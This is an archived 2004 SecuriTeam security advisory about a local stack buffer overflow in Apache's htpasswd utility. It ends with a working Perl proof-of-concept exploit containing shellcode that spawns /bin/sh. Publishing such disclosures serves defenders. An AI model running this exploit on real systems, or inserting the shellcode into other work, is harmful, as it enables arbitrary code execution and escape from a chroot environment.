Date: 19 Sep 2004 17:00:12 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [UNIX] Apache htpasswd Local Stack Overflow
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Apache htpasswd Local Stack Overflow
------------------------------------------------------------------------
SUMMARY
Apache has "been the most popular web server on the Internet since April
of 1996". One of Apache's components is htpasswd which is used to create
and update user authentication files. A buffer overflow vulnerability in
the htpasswd allows local attackers and anyone else that is able to invoke
it from a remote location to cause it to execute arbitrary code.
DETAILS
Vulnerable Systems:
* Apache version 1.3.31 and prior
In apache/src/support/htpasswd.c were found lots of problems with strcpy.
Unchecked buffers with user and passwd variables may let an attacker to
take advantage of it.
Impact:
htpasswd is not setuid root by default. And it doesn't have any sense to
do it yourself. So you can't gain root by exploiting these bugs directly.
However, you can get out from apache's chroot environment since htpasswd
usually stays in its environment.
Proof of Concept:
#!/usr/bin/perl
# Proof Of Concept exploit for htpasswd of Apache.
# Read the advisory for more information.
# - Luiz Fernando Camargo
# - [email protected]
$shellcode =
"\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);
print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";
local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;
exec("$target -nb $buffer");
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> Luiz
Fernando.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.